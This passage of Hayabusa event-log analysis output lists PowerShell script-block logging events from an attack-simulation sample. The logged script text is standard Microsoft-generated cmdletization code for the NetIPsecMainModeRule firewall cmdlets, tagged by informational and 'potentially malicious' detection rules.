[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 